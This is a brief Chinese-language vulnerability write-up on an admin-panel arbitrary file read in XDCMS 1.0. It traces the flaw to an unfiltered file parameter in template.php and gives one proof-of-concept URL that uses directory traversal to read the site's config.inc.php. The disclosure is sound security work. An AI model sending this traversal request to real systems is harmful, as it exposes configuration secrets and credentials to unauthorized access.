# XDCMS 1.0 后台任意文件读取
==========================
一、漏洞简介
————
二、漏洞影响
————
XDCMS 1.0
三、复现过程
————
漏洞文件漏洞文件:`system\modules\xdcms\template.php`,同上述xss漏洞相同
![](/static/qingy/XDCMS_1.0_后台任意文件读取/img/rId24.jpg)
第43行未对文件进行限制,从而导致了目录遍历,造成任意文件读取
对GET数据没有过滤
http://www.0-sec.orv/xdcms/index.php?m=xdcms&c=template&f=edit&file=../../../data/config.inc.php
后台任意文件读取。
![](/static/qingy/XDCMS_1.0_后台任意文件读取/img/rId25.jpg)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容